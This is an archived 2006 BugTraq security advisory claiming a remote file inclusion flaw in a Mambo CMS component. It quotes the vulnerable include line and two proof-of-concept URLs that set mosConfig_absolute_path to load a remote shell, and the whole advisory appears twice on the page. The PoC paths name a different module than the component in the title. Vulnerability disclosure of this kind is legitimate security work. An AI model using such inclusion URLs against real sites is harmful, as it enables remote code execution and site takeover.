BugTraq
Back to list
|
Post reply
Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
Aug 20 2006 01:01AM
Outlaw aria-security net
########################################################################
###################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
########################################################################
###################
#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion
#Source:
#include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.".
************************************************************************
************
#Proof of Concept:
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php
?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?m
osConfig_absolute_path=shell
#----------------------------------------------------------
#
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
###################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
########################################################################
###################
#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion
#Source:
#include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.".
************************************************************************
************
#Proof of Concept:
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php
?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?m
osConfig_absolute_path=shell
#----------------------------------------------------------
#
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
[ reply ]